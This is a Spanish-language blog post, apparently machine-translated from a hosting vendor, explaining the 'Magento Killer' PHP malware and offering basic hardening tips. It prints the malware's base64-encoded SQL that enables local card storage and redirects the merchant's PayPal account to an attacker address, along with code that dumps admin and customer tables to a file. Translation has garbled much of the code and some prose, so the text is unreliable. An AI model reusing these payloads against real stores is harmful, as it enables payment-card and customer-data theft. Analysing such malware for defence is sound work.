Magento Killer: una nueva amenaza de seguridad para las tiendas Magento

En este artículo, descubrirá todo lo que necesita saber sobre Magento Killer. Qué es. Cómo te afecta la tienda Magento. (Y lo más importante de todo) cómo asegurar su tienda de comercio electrónico en ella. Vamos a bucear directamente. ¿Qué es Magento Killer? Magento Killer es un script PHP malicioso que los hackers usan para cambiar la tabla Core_Config_Data para robar la información de pago de la base de datos Magento. Utiliza principalmente 2 objetos: actualizar DB (SAVECC) y PP Update (MailP). Asegurar su tienda de comercio electrónico se ha vuelto más crucial que nunca. Es responsabilidad del propietario de cada tienda Magento proteger sus datos personales y de pago de sus clientes. El usuario considera la seguridad de la plataforma como un factor vital de confianza que puede afectar directamente la elección de una tienda en línea en particular.
Estados Unidos e India. 1 para ataques dirigidos, seguido de la India. Aquí está el desglose de los primeros 10 países que se ven más afectados por este tipo de ataques:-

Fuente: Norton Magento alimenta a más de 250,000 sitios web en todo el mundo. Por lo tanto, no debe ser sorprendente que a menudo sea el objetivo de los ciberdelincuentes o piratas informáticos. Siempre buscan espacios en la configuración de su tienda Magento para que puedan obtener acceso a datos confidenciales.
¿Cómo funciona $ confkiller? $ Confliller o magento asesino realiza operaciones maliciosas para robar información de pago del cliente. El primer paso es un ataque a los interrogatorios SQL especiales codificados en Base64 Esto puede ocurrir de la siguiente manera: – $ confkiller = matrix (“Update DB (SAVECC)” =>
base64_decode ( ‘VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVfaWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs =’),
// Actualizar `core_config_data` set` scope` = ‘default’,` scope_id` = ‘0’, `parche` = ‘pagos/ccsave/assets’,` value ‘=’ 1 ‘wher` patha =’ pay/’ ccsave/activo ‘;
“Actualizar pp (mailpp)” =>
base64_decode ( ‘VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lkYCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3RlZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7’)
// Actualizar `core_config_data` set` scope` = ‘default’,` scope_id` = ‘0’, `patha` = ‘paypal/general/Business_account’,` valor = ‘editado]@gmail.com’ donde ‘`ruta = ‘PayPal/General/Account_de_fatre’; Hay principalmente 2 objetos en la matriz $ confliller que son responsables de la infección. Estos 2 permiten a los piratas informáticos robar la información fácilmente y transferirlos a cualquier ubicación.
Actualizar DB (SAVECC): configure el almacén Magento para que, en lugar de enviar la información de la tarjeta de crédito al procesador de pago autorizado, guarde los datos de pago en el servidor.
Actualización de PP (Mailpp): esto reemplaza la cuenta de PayPal del comerciante conectado al sitio web con la cuenta del hacker. Para proteger los datos del cliente, Magento cifra los detalles de pago guardados localmente, pero esto falla si su sitio está atacado con Magento Killer.
El atacante puede acceder al archivo ./App/etc/local.xml Al Magento que contiene la clave de cifrado utilizando este script malicioso. Una vez que se obtiene la clave, descifran la información de pago en el texto simple para continuar usándolos para transacciones fraudulentas o para venderla a cualquier otra persona.
El segundo paso es robar datos de las bases de datos Magento, pero el robo del número de tarjeta de crédito no es suficiente para realizar transacciones corruptas, el hacker debe tener la información personal del cliente. Puede incluir el nombre correcto, la dirección de correo electrónico y la dirección permanente. 1. Para robar estos datos adicionales, ejecutan otro script utilizado en su consulta SQL desde la base de datos inyectada de Magento. $ query = matrix (

‘admin_user’ => ‘select * de admin_user’,
‘aw_blog_comment’ => ‘select * de AW_Blog_Comment’,
‘Core_emmail_queue_recipients’ => ‘SELECT * de Core_Email_queue_recipients’,
‘Customer_entity’ => ‘Seleccionar * de Customer_Entity’, 2. Extraiga cualquier información sobre los clientes almacenados en las tablas de la base de datos Magento.
3. Luego corte estos datos, manteniendo solo la información necesaria para compras fraudulentas. Finalmente, genera un archivo *-shcmail.txt en el directorio que contiene información relevante al cliente. $ nameFile = md5 (time ()). “-shcmail.txt”;
Foreach ($ consulta como $ shc_key => $ shc_query) {$ hasil = mysql_query ($ shc_query);
While ($ kolom_db = mysql_fetch_assoc ($ hasil)) {
$ mail [] = $ kolom_db [$ shcolom [$ shc_key]];
$ myFile = fopen ($ namefile, “a+”) o morir (“¡no se puede abrir el archivo!”);
fwrite ($ mi archivo, $ kolom_db [$ shcolom [$ shc_key]]. “rn”);
fclose ($ mi archivo); ¿Cómo asegurar su tienda electrónica Magento Killer? 1. Esté actualizado en el nivel de seguridad más alto utilizando la última versión de Magento. Si todavía está utilizando versiones obsoletas, comprometa la seguridad de su sitio y repite los datos de sus clientes.
2. Use WAF WAF, un acrónimo de Firewall de aplicaciones web ofrece un amplio nivel de seguridad para su tienda Magento. Como ciberdelincuentes, como hackers y estafas, usan sus campos y datos para inyectar una declaración MySQL. Cruce nuestra guía de seguridad Magento para asegurar su tienda. 3. Active la autenticación de dos pasos en dos pasos es una característica que mejora su seguridad comercial electrónica, evitando cualquier acceso intrusor a su sitio web. Al activar la autenticación de dos factores, debe tener más de lo habitual. Además del nombre de usuario y la contraseña para conectarse a su cuenta, necesitará otra información. Por ejemplo, un código único.
Si todavía tiene problemas de seguridad de Magento, entonces nuestros expertos en Magento están aquí para ayudarlo.ServerGuy ofrece servicios de alojamiento de magento totalmente seguros, para que su sitio permanezca protegido por tales ataques. También puede dejar un comentario a continuación y definitivamente nos comunicaremos con usted.